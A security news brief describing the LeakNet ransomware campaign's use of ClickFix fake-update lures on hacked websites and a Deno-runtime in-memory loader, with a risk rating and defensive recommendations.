LeakNet Ransomware Uses ClickFix via Hacked Sites,

What Happened

The LeakNet ransomware operation has evolved its tactics, incorporating the “ClickFix” social engineering technique for initial access and deploying a novel malware loader based on the Deno runtime. According to security reports, attackers are compromising legitimate websites to host malicious advertisements or pop-ups. These elements trick users into believing a critical software update, like a browser or plugin fix, is required. When clicked, the action downloads a malicious installer, granting the threat actors an initial foothold inside corporate networks. Following access, the attackers deploy a loader that leverages the open-source Deno runtime to execute JavaScript and TypeScript payloads directly in memory.

Why It Matters

This development is significant for two primary reasons. First, the use of ClickFix exploits human trust in common software update prompts, making it a highly effective social engineering vector that can bypass technical controls. Second, the adoption of the Deno runtime for a loader represents a notable shift in the malware landscape. Deno is less commonly monitored for malicious use compared to traditional frameworks like Node.js or PowerShell, allowing the loader to operate with greater stealth and evade signature-based detection. This combination increases the likelihood of successful initial compromise and subsequent payload execution.

Technical Details

The attack chain begins with a compromised website serving a fraudulent “ClickFix” or “Update” prompt. The downloaded installer is typically a disguised executable that establishes initial access. The key technical innovation is the subsequent loader. By utilizing the Deno runtime, the malware can fetch and execute additional payloads-likely the ransomware itself-directly in system memory (a fileless technique). This in-memory execution leaves minimal forensic traces on disk. The loader’s use of a legitimate, signed runtime binary (deno.exe) further aids in evading application allow-listing and behavioral analysis tools that may not flag Deno’s network activity as suspicious.

Immediate Risk

The immediate risk is MEDIUM. While not exploiting a specific software vulnerability, the campaign’s social engineering component poses a broad threat to any organization whose employees browse the web. The attack vector is not targeted; any user visiting a compromised site could be hit. The primary risk is initial access leading to a full ransomware deployment, resulting in data encryption, exfiltration, and potential operational disruption. Organizations without robust web filtering, endpoint detection for in-memory attacks, and security awareness training are at elevated risk.

Security Insight

This campaign underscores the need for a layered defense that addresses both human and technical factors. Security teams should reinforce user training to recognize social engineering lures, specifically warning against unsolicited update prompts from websites. Technically, monitoring for unusual network connections originating from legitimate but uncommon processes like deno.exe is crucial. Implementing application allow-listing that strictly controls which scripts and runtimes can execute, alongside behavioral detection for in-memory payloads, can effectively counter this loader technique. Proactive hunting for Deno runtime execution in non-development environments is now a prudent defensive measure.